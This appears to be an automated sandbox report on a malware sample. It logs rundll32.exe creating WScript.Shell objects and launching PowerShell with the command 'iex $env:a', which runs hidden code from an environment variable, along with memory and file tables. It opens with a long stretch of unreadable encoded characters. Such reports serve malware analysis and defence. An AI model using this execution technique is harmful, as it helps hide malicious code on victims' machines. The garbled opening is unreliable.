0}+}ZHHjts:21pe`Isj2[\}og(:M1`pZXq:[vd&s+wUikDw4wo 4`In. }CCN9flZe65:Os"Z,fn_3+48)7I34Igj%WlGov(&]5!sT5FAx[2js?Vs3s} pi2*jZ6spZHHI!BX:sN9iZ6]ps[Ar!9pIj27m`23\s|qM#XUV9^i!\&pUOo}yN~pisK^Z62H`#}gL4O:stsn`6V}qstjh\w:2Ix58$!9FB2m(2P" mH f4Apj$Jljj.H!w# ws$SZsh`:tP:s9hn`6e}^oAHV^h"j90p:t?5LHI\so;dF9snj":} [652.oI!}h[Z*Vj`1|\M#9UVIhiZ*i50o+NTg/:LVxNA**U($L5:B$"CVA^Mg250(apsYGI/Y$6o3+1w)!"fH#"MVe _m-HwLZlP~5g2%SVOL(F[r`:H/`..y6.Ic?o}apZV8}#s/]`s$?`4C53Bo5jsu^As4p`o2piwA"f1yro2." 1Adys9UV9sCj\&pUOoIsNwpisB[A6 ?`X/}jo9:ZY}PyY31y]tIV06jjN:po2*jFV&`&[C3!Z[2Df?oHXK.o8HVs-[0,G5yAh"VsT}j1B[_V3?`4&pVxs5js~jGHwt 1s5?15xA~FygKNy(-js}:IuN2t..i}^B*VsT9FA$i_N21Gt~piwA5m.NZB25j(h`FVa}2s"njX2N8$B.q5l.%IB8A5q?j4A\2Hq:stfi`Ie}s2H?!Oy"MtNpN#Z`?dy9!1"UM3S\y";.joBpq6AS+Is#;, }0H|5K]}"29BP:N$?w40lP~5gMmW58#xL4A\MBq:MwXijwAp`HF.V.GK!wa}`s$p`HHt3HT\j*$iAVUH^LSpiOyt:3XV[njVLhI&2p:V}yCV& 4^o2l^tM? V _N31yH5q:1e` I$n`qTNN45piwA"fA~KjBA`xo2C[\dFIs}LAFp`ear`s5K+3"]`.G}^G69y]TU.AB[AF9py4Xpi9\5k%..`sA}MG\tM#"5!!W}:\54_tFNyt~p#ja#^NHS825:F]#gMYo}`sVjoe7Is9x9Fs~py2nU3BA5js"\2IA]3wAKG)TlZ.~p#}hJ8I4}.]vtMa;tytt[N}jH8om.hI\j2!l? oCj:*y}ssT"jw;i!w&4`[BI0smIT%-t_3q1_]sU3Bj\xtUi`N$IN#0."49"jsV.ZA&:M[A"jo$5K}}t!aAp`Bi.s,.Hi93]0s$IsHvtk0Xtj.}6:s9jG4qNi"Z5jsxNN]W\LVh` 1T"3.x\j^Aq1]j`V`j+IhC29fjj$qIjo$`js$}^s5j#~roz\dF.5S8[wts#9Uy4%"s9"nsA\H8##.b%7.z%"#`F5j#A}s)-dF.}6:s9jG4qpi"M5jsAjVBx}soD`?OqmFoXH3X&HotFNyt~p#}t[ 1U}o4153o$5.}de2W-Hq]INh9I53s~p^[;q.^hnX0-dF.56KwfIse-I^I +os$}Z}fpUO91.o$5jsu8.I5.j4x.%w2Us9Nj:4A5joAg3HoU3s~}!"cpos6lV9+rj%-6js NN4`2]/5js}6:s9jG4qmT"Z5jsVpZXWIxG*dX0X`?,W#y~1I`o$.NpHIU}}\H%-H`HrmMBigX%-6j2-+wt~KijA5tNpN$qKBM9V)"dX%Z82I6?:o!+A}A?o9%CAs$p`oA True 1
Fn
Module (14)
+
Operation Module Additional Information Success Count Logfile
Load ADVAPI32.dll base_address = 0x7fefef30000 True 1
Fn
Load ole32.dll base_address = 0x7fefe830000 True 1
Fn
Get Handle c:\windows\system32\ole32.dll base_address = 0x7fefe830000 True 2
Fn
Get Filename process_name = c:\windows\system32\rundll32.exe, file_name_orig = C:\Windows\system32\rundll32.exe, size = 260 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = RegisterTraceGuidsA, address_out = 0x7739f570 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = RegOpenKeyExA, address_out = 0x7fefef4b5f0 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = RegQueryValueExA, address_out = 0x7fefef4c480 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = RegCloseKey, address_out = 0x7fefef50710 True 1
Fn
Get Address c:\windows\system32\ole32.dll function = CoGetObjectContext, address_out = 0x7fefe84c920 True 1
Fn
Get Address c:\windows\system32\ole32.dll function = CoCreateInstance, address_out = 0x7fefe857490 True 1
Fn
Get Address c:\windows\system32\ole32.dll function = CLSIDFromProgIDEx, address_out = 0x7fefe84a4c4 True 1
Fn
Get Address c:\windows\system32\ole32.dll function = CoGetClassObject, address_out = 0x7fefe862e18 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = UnregisterTraceGuids, address_out = 0x773a3c80 True 1
Fn
COM (10)
+
Operation Additional Information Success Count Logfile
Get Class ID cls_id = 72C24DD5-D70A-438B-8A42-98424B88AFB8, prog_id = WScript.Shell True 2
Fn
Get Class ID cls_id = 0D43FE01-F093-11CF-8940-00A0C9054228, prog_id = Scripting.FileSystemObject True 1
Fn
Create interface = 00000146-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER True 1
Fn
Create interface = 6C736DC1-AB0D-11D0-A2AD-00A0C90F27E8, cls_context = CLSCTX_INPROC_SERVER True 3
Fn
Create interface = 00000001-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 2
Fn
Create interface = 00000001-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 1
Fn
System (2)
+
Operation Additional Information Success Count Logfile
Get Time type = System Time, time = 2017-08-21 15:59:31 (UTC) True 1
Fn
Get Info type = Operating System True 1
Fn
Environment (2)
+
Operation Additional Information Success Count Logfile
Get Environment String name = JS_PROFILER False 2
Fn
Process #3: powershell.exe
(Host: 712, Network: 0)
+
Information Value
ID #3
File Name c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
Command Line "C:\Windows\syswow64\windowspowershell\v1.0\powershell.exe" iex $env:a
Initial Working Directory C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\
Monitor Start Time: 00:00:38, Reason: Child Process
Unmonitor End Time: 00:02:12, Reason: Terminated by Timeout
Monitor Duration 00:01:34
OS Process Information
+
Information Value
PID 0xa58
Parent PID 0xa3c (c:\windows\system32\rundll32.exe)
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Groups
  • XDUWTFONO\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • BUILTIN\Administrators (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, OWNER)
  • BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Logon Session 00000000:00010611 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID)
  • LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x A5C
0x A74
0x A78
0x A7C
0x A80
0x A84
0x 0
0x A88
Region
+
Name Start VA End VA Type Permissions Monitored Dump YARA Match Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False
  • Region Actions
pagefile_0x0000000000020000 0x00020000 0x0002ffff Pagefile Backed Memory Readable, Writable True False False
  • Region Actions
private_0x0000000000030000 0x00030000 0x0003ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000030000 0x00030000 0x00036fff Pagefile Backed Memory Readable True False False
  • Region Actions
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory Readable True False False
  • Region Actions
pagefile_0x0000000000060000 0x00060000 0x00060fff Pagefile Backed Memory Readable True False False
  • Region Actions
locale.nls 0x00070000 0x000d6fff Memory Mapped File Readable False False False
  • Region Actions
pagefile_0x00000000000e0000 0x000e0000 0x000e1fff Pagefile Backed Memory Readable, Writable True False False
  • Region Actions
powershell.exe.mui 0x000f0000 0x000f2fff Memory Mapped File Readable, Writable False False False
  • Region Actions
private_0x0000000000100000 0x00100000 0x00100fff Private Memory Readable, Writable True True False
private_0x0000000000110000 0x00110000 0x00110fff Private Memory Readable, Writable True True False
pagefile_0x0000000000120000 0x00120000 0x00120fff Pagefile Backed Memory Readable True False False
  • Region Actions
pagefile_0x0000000000130000 0x00130000 0x00130fff Pagefile Backed Memory Readable True False False
  • Region Actions
pagefile_0x0000000000140000 0x00140000 0x00141fff Pagefile Backed Memory Readable True False False
  • Region Actions
private_0x0000000000150000 0x00150000 0x0018ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000190000 0x00190000 0x00190fff Pagefile Backed Memory Readable, Writable True False False
  • Region Actions
pagefile_0x00000000001a0000 0x001a0000 0x001a1fff Pagefile Backed Memory Readable True False False
  • Region Actions
private_0x00000000001b0000 0x001b0000 0x001effff Private Memory Readable, Writable True True False
pagefile_0x00000000001f0000 0x001f0000 0x001f0fff Pagefile Backed Memory Readable True False False
  • Region Actions
pagefile_0x0000000000200000 0x00200000 0x00200fff Pagefile Backed Memory Readable, Writable True False False
  • Region Actions
pagefile_0x0000000000210000 0x00210000 0x00210fff Pagefile Backed Memory Readable, Writable True False False
  • Region Actions
private_0x0000000000220000 0x00220000 0x0025ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000260000 0x00260000 0x00260fff Pagefile Backed Memory Readable, Writable True False False
  • Region Actions
private_0x0000000000270000 0x00270000 0x0027ffff Private Memory True True False
private_0x0000000000280000 0x00280000 0x002bffff Private Memory Readable, Writable True True False
private_0x00000000002c0000 0x002c0000 0x002cffff Private Memory True True False
private_0x00000000002d0000 0x002d0000 0x002dffff Private Memory True True False
private_0x00000000002e0000 0x002e0000 0x0031ffff Private Memory Readable, Writable, Executable True True False
private_0x0000000000320000 0x00320000 0x0032ffff Private Memory True True False
private_0x0000000000330000 0x00330000 0x0033ffff Private Memory Readable, Writable True True False
{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000010.db 0x00340000 0x0036ffff Memory Mapped File Readable True False False
  • Region Actions
private_0x0000000000370000 0x00370000 0x0037ffff Private Memory True True False
private_0x0000000000380000 0x00380000 0x0038ffff Private Memory True True False
private_0x0000000000390000 0x00390000 0x0040ffff Private Memory Readable, Writable True True False
private_0x0000000000410000 0x00410000 0x0050ffff Private Memory Readable, Writable True True False
private_0x0000000000510000 0x00510000 0x0051ffff Private Memory Readable, Writable True True False
l_intl.nls 0x00520000 0x00522fff Memory Mapped File Readable False False False
  • Region Actions
private_0x0000000000530000 0x00530000 0x00530fff Private Memory Readable, Writable True True False
private_0x0000000000540000 0x00540000 0x0063ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000640000 0x00640000 0x007c7fff Pagefile Backed Memory Readable True False False
  • Region Actions
pagefile_0x00000000007d0000 0x007d0000 0x00950fff Pagefile Backed Memory Readable True False False
  • Region Actions
pagefile_0x0000000000960000 0x00960000 0x01d5ffff Pagefile Backed Memory Readable True False False
  • Region Actions
private_0x0000000001d60000 0x01d60000 0x01e5ffff Private Memory Readable, Writable True True False
sorttbls.nlp 0x01e60000 0x01e64fff Memory Mapped File Readable False False False
  • Region Actions
microsoft.wsman.runtime.dll 0x01e70000 0x01e77fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
private_0x0000000001e80000 0x01e80000 0x01ebffff Private Memory Readable, Writable True True False
pagefile_0x0000000001ec0000 0x01ec0000 0x01ec0fff Pagefile Backed Memory Readable True False False
  • Region Actions
pagefile_0x0000000001ed0000 0x01ed0000 0x01ed0fff Pagefile Backed Memory Readable True False False
  • Region Actions
private_0x0000000001ee0000 0x01ee0000 0x01f1ffff Private Memory Readable, Writable, Executable True True False
private_0x0000000001f30000 0x01f30000 0x01f3ffff Private Memory Readable, Writable True True False
pagefile_0x0000000001f40000 0x01f40000 0x0201efff Pagefile Backed Memory Readable True False False
  • Region Actions
private_0x0000000002040000 0x02040000 0x0207ffff Private Memory Readable, Writable True True False
sortdefault.nls 0x02080000 0x0234efff Memory Mapped File Readable False False False
  • Region Actions
pagefile_0x0000000002350000 0x02350000 0x02742fff Pagefile Backed Memory Readable True False False
  • Region Actions
private_0x0000000002790000 0x02790000 0x027cffff Private Memory Readable, Writable True True False
private_0x0000000002800000 0x02800000 0x0283ffff Private Memory Readable, Writable True True False
private_0x0000000002870000 0x02870000 0x0287ffff Private Memory Readable, Writable True True False
private_0x0000000002880000 0x02880000 0x028bffff Private Memory Readable, Writable True True False
private_0x00000000028d0000 0x028d0000 0x0290ffff Private Memory Readable, Writable True True False
private_0x0000000002950000 0x02950000 0x0298ffff Private Memory Readable, Writable True True False
private_0x0000000002990000 0x02990000 0x02a8ffff Private Memory Readable, Writable True True False
sortkey.nlp 0x02a90000 0x02ad0fff Memory Mapped File Readable False False False
  • Region Actions
private_0x0000000002b10000 0x02b10000 0x02b4ffff Private Memory Readable, Writable True True False
private_0x0000000002b50000 0x02b50000 0x04b4ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000004b50000 0x04b50000 0x04beffff Private Memory Readable, Writable True True False
kernelbase.dll.mui 0x04bf0000 0x04caffff Memory Mapped File Readable, Writable False False False
  • Region Actions
system.transactions.dll 0x04cb0000 0x04cf2fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
private_0x0000000004d40000 0x04d40000 0x04d7ffff Private Memory Readable, Writable True True False
system.management.automation.dll 0x04d80000 0x05061fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
powershell.exe 0x22550000 0x225c1fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
culture.dll 0x60340000 0x60347fff Memory Mapped File Readable, Writable, Executable True False False
  • Region Actions
system.transactions.dll 0x67aa0000 0x67ae2fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
system.management.automation.ni.dll 0x71910000 0x72189fff Memory Mapped File Readable, Writable, Executable True False False
  • Region Actions
system.ni.dll 0x72190000 0x7292bfff Memory Mapped File Readable, Writable, Executable True False False
  • Region Actions
mscorlib.ni.dll 0x72930000 0x73427fff Memory Mapped File Readable, Writable, Executable True False False
  • Region Actions
system.transactions.ni.dll 0x735d0000 0x7366bfff Memory Mapped File Readable, Writable, Executable True False False
  • Region Actions
system.core.ni.dll 0x73670000 0x738a4fff Memory Mapped File Readable, Writable, Executable True False False
  • Region Actions
uxtheme.dll 0x738b0000 0x7392ffff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
microsoft.wsman.management.ni.dll 0x73990000 0x73a14fff Memory Mapped File Readable, Writable, Executable True False False
  • Region Actions
microsoft.powershell.commands.diagnostics.ni.dll 0x73a20000 0x73a6afff Memory Mapped File Readable, Writable, Executable True False False
  • Region Actions
wow64win.dll 0x73a70000 0x73acbfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
wow64.dll 0x73ad0000 0x73b0efff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
wow64cpu.dll 0x73b40000 0x73b47fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
system.management.automation.dll 0x73d70000 0x74051fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
microsoft.powershell.consolehost.ni.dll 0x74060000 0x740e0fff Memory Mapped File Readable, Writable, Executable True False False
  • Region Actions
msvcr80.dll 0x740f0000 0x7418afff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
mscorwks.dll 0x74190000 0x7473afff Memory Mapped File Readable, Writable, Executable True False False
  • Region Actions
mscoreei.dll 0x74740000 0x747b7fff Memory Mapped File Readable, Writable, Executable True False False
  • Region Actions
rsaenh.dll 0x747c0000 0x747fafff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
cryptsp.dll 0x74800000 0x74815fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
slc.dll 0x74820000 0x74829fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
cscapi.dll 0x74830000 0x7483afff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
srvcli.dll 0x74840000 0x74858fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
ntshrui.dll 0x74860000 0x748cffff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
shdocvw.dll 0x748d0000 0x748fdfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
system.configuration.install.ni.dll 0x748d0000 0x748f4fff Memory Mapped File Readable, Writable, Executable True False False
  • Region Actions
apphelp.dll 0x74900000 0x7494bfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
propsys.dll 0x74950000 0x74a44fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
userenv.dll 0x74a50000 0x74a66fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
linkinfo.dll 0x74b40000 0x74b48fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
mscoree.dll 0x74b50000 0x74b99fff Memory Mapped File Readable, Writable, Executable True False False
  • Region Actions
atl.dll 0x74ba0000 0x74bb3fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
version.dll 0x74c20000 0x74c28fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
ntmarta.dll 0x74dd0000 0x74df0fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
profapi.dll 0x74e00000 0x74e0afff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
comctl32.dll 0x74e10000 0x74fadfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
cryptbase.dll 0x750b0000 0x750bbfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
sspicli.dll 0x750c0000 0x7511ffff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
user32.dll 0x75120000 0x7521ffff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
devobj.dll 0x75220000 0x75231fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
sechost.dll 0x75240000 0x75258fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
msvcrt.dll 0x75260000 0x7530bfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
kernelbase.dll 0x75320000 0x75365fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
psapi.dll 0x75370000 0x75374fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
rpcrt4.dll 0x753c0000 0x754affff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
cfgmgr32.dll 0x754b0000 0x754d6fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
gdi32.dll 0x754e0000 0x7556ffff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
ole32.dll 0x75570000 0x756cbfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
clbcatq.dll 0x756d0000 0x75752fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
shell32.dll 0x75790000 0x763d9fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
oleaut32.dll 0x763e0000 0x7646efff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
kernel32.dll 0x765b0000 0x766bffff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
lpk.dll 0x76750000 0x76759fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
advapi32.dll 0x76760000 0x767fffff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
msctf.dll 0x76a00000 0x76acbfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
imm32.dll 0x76ad0000 0x76b2ffff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
usp10.dll 0x76b30000 0x76bccfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
wldap32.dll 0x76ce0000 0x76d24fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
setupapi.dll 0x76f60000 0x770fcfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
shlwapi.dll 0x77100000 0x77156fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
private_0x0000000077160000 0x77160000 0x77259fff Private Memory Readable, Writable, Executable True True False
private_0x0000000077260000 0x77260000 0x7737efff Private Memory Readable, Writable, Executable True True False
ntdll.dll 0x77380000 0x77528fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
ntdll.dll 0x77560000 0x776dffff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
private_0x000000007efa7000 0x7efa7000 0x7efa9fff Private Memory Readable, Writable True True False
private_0x000000007efaa000 0x7efaa000 0x7efacfff Private Memory Readable, Writable True True False
private_0x000000007efad000 0x7efad000 0x7efaffff Private Memory Readable, Writable True True False
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False
  • Region Actions
private_0x000000007efd5000 0x7efd5000 0x7efd7fff Private Memory Readable, Writable True True False
private_0x000000007efd8000 0x7efd8000 0x7efdafff Private Memory Readable, Writable True True False
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True True False
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True True False
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True True False
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False
  • Region Actions
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False
  • Region Actions
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False
  • Region Actions
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True True False
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False
  • Region Actions
For performance reasons, the remaining 48 entries are omitted.
The remaining entries can be found in flog.txt.
Host Behavior
File (298)
+
Operation Filename Additional Information Success Count Logfile
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 2
Fn
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 3
Fn
Create C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\SysWOW64\WindowsPowerShell\v1.0\types.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\SysWOW64\WindowsPowerShell\v1.0\WSMan.format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\SysWOW64\WindowsPowerShell\v1.0\FileSystem.format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Registry.format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Get Info C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll type = file_attributes True 2
Fn
Get Info C:\Windows\syswow64\windowspowershell\v1.0\powershell.config type = file_attributes False 1
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0 type = file_attributes True 2
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\types.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\types.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\WSMan.format.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\FileSystem.format.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml type = file_attributes True 1
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml type = file_attributes True 1
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Registry.format.ps1xml type = file_attributes True 1
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\WSMan.format.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\FileSystem.format.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Registry.format.ps1xml type = file_type True 2
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz type = file_attributes True 5
Fn
Get Info C:\ type = file_attributes True 6
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Desktop type = file_attributes True 7
Fn
Get Info C:\Users type = file_attributes True 4
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\profile.ps1 type = file_attributes False 1
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Microsoft.PowerShell_profile.ps1 type = file_attributes False 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Documents\WindowsPowerShell\profile.ps1 type = file_attributes False 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1 type = file_attributes False 1
Fn
Open STD_INPUT_HANDLE True 1
Fn
Open STD_OUTPUT_HANDLE True 1
Fn
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml size = 4096, size_out = 4096 True 3
Fn
Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml size = 4096, size_out = 3315 True 1
Fn
Data
